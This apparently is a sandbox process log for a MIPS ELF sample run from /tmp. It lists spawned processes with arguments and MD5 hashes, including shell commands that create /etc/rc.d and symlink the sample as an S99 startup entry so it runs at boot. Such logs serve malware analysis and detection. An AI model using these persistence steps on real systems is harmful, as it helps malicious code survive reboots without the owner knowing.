                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/bin/mkdir
                                                                                        Arguments:mkdir -p /etc/rc.d
                                                                                        File size:88408 bytes
                                                                                        MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/bin/ln
                                                                                        Arguments:ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
                                                                                        File size:76160 bytes
                                                                                        MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                        Arguments:-
                                                                                        File size:483056 bytes
                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                        File size:31112 bytes
                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:-
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File size:22760 bytes
                                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                        Arguments:-
                                                                                        File size:483056 bytes
                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                        Start time (UTC):08:42:53
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                        File size:31112 bytes
                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                        Start time (UTC):08:42:53
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                        Arguments:-
                                                                                        File size:483056 bytes
                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                        Start time (UTC):08:42:53
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                        File size:31112 bytes
                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4